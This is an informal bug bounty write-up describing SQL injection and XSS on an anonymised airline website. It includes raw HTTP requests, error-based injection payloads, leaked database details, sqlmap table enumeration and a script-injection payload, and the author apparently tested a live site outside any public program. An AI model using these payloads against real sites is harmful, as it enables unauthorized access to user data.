SQLi & XSS Vulnerabilities in a Popular Airlines Website | BugBounty POC

Hey Guys, Some of my friends was asking for another Writeup. so Here’s One :) Last month I decided to practice a little So I took one of the popular websites… Lets Take That Website as goodwesite.com (As Its Not a public Program) Lets start from a Little basics.

What is SQL Injection Vulnerability?

This vulnerability allows an unauthenticated user to grab data from the victim’s website database, including sensitive user information.

Why This issue existed?

This issue existed because goodwebsite allowed improperly sanitized user input in a login Page; which is basically the same as adding user input inside a raw SQL query. Using this attack vector, an attacker could leak hashed passwords & Some other data.

So! I Was Testing the website and While testing around In Login page i enter username and password randomly and intercept the request with Burp Suite and change the username with Test%27 and Then I forward the Request to Burp Repeater and I got a Reply with an Error That was basically like Request and The Error in Response was like.

Request:
POST /register-login/check.php HTTP/1.1
Content-Length: 76
Content-Type: application/x-www-form-urlencoded
Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724
Host: goodwebsite.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
strLogin=Test%27&strPassword=k
Response Error:
<pre>PDOException Object ( [message:protected] => SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test’ ‘ and `valid_id` = 1’ at line 1 [string:Exception:private] => [code:protected] => 42000 [file:protected] => /var/www/goodwebsite.server.com/register-login/send.php [line:protected] => 10 [trace:Exception:private] => Array ( [0] => Array ( [file] => /var/www/goodwebsite.server.com/register-login/send.php [line] => 10 [function] => query [class] => PDO [type] => -> [args] => Array ( [0] => SELECT * FROM `wp_ggg_user` WHERE `login` = Test’e ‘ and `valid_id` = 1; ) [previous:Exception:private] => [errorInfo] => Array ( [0] => 42000 [1] => 1064 [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Test’ ‘ and `valid_id` = 1’ at line 1 ) </pre>

So! after that error Came Up! I was like WTF :O Lets try Something else so I tried some SQL query And The First Query used was Test%27and extractvalue(1,concat(0x00a,database()))or’ and yes The error That appears this time was similar as above with just a Minor Change that was at the end of the error it was like…

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
goodwebsite’
)

So! it actually gave me the Database Name that was goodwebsite :)

Database Name

I actually got Expert Advice on this From @iamnoooob , (He actually is 1337 calling himself N00B):D Thanks Bro :p

I basically tested some basic query’s like

system_user()
@@version
database()
@@hostname
@@datadir
@@GLOBAL.VERSION
session_user()
schema()
UUID()

So Next The Query was Test%27and extractvalue(1,concat(0x00a,system_user()))or’ and The Error gave me

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
goodwebsite@localhost’
)
System_User

So! At the point The SQL injection was Confirmed But i decided to Dig a little further to get some more information, and the 3rd Query Used was
Test%27and extractvalue(1,concat(0x00a,@@hostname))or’
and This time the error had

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: '
www2.rz.something.com'
)
Hostname

Next i totally forget to check the version so!
Test%27and extravtcalue(1,concat(0x00a,@@version))or’
and The Output was

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
5.1.73–1+deb6u1-log’
)
Database Version

well Then I Tried Test%27and extractvalue(1,concat(0x00a,UUID())or’ and The Error was

[previous:Exception:private] =>
[errorInfo] => Array
(
[0] => HY000
[1] => 1105
[2] => XPATH syntax error: ‘
ab88…..UUDI’
)
UUID

So! Till Now I got Much of the Information That was Enough to Demonstrate the Impact But Sometimes i like to dig More so I Thought to save some time i opened a terminal and Run sqlmap. and Here’s What I got

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
Database: goodwebsite
[18 tables]
+ — — — — — — — — — — — — -+
| wp_bms_log |
| wp_bms_quiz_lh_answer |
| wp_bms_quiz_lh_question |
| wp_bms_quiz_lh_quiz |
| wp_bms_statistics |
| wp_bms_user |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+ — — — — — — — — — — — — -+
Then:
Table: wp_users
[10 columns]
+ — — — — — — — — — — -+ — — — — — — — — — — -+
| Column | Type |
+ — — — — — — — — — — -+ — — — — — — — — — — -+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+ — — — — — — — — — — -+ — — — — — — — — — — -+
Exploitation through SQLmap

And Yes! That’s Where I stop Exploitation :P lol

XSS:

Next Thing was to test something else I saw another endpoint their that was like
goodwebsite.com/register-login/send.php it accepts POST request with perimeter
strSendMail=
So I tried the same SQL Test and Got the same Error But I tried XSS payload,
e’%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>
And The Request was like:

POST /register-login/send.php HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Referer: http://goodwebsite.com/
Cookie: bmslogin=no; bmsid=f3011db015dca9a4f2377cd4e864f724
Host: goodwebsite.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
strSendMail=e’%22()%26%25<acx><ScRiPt%20>prompt(/khizer/)</ScRiPt>

And BOOM!

XSS

So! I reported Both the Bugs with details and They Actually got patched within an Hour of My report and This is What I got in Reply

Reply

Well I asked if they can invite to Private HackerOne Program But Yet! They can’t ;’) But it Was good Patrice and Fun :D

That’s All Folks :p Good-bye for now Hop Will Publish Some More POCs Soon ;)and Forget to Send Feedback! 😾

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.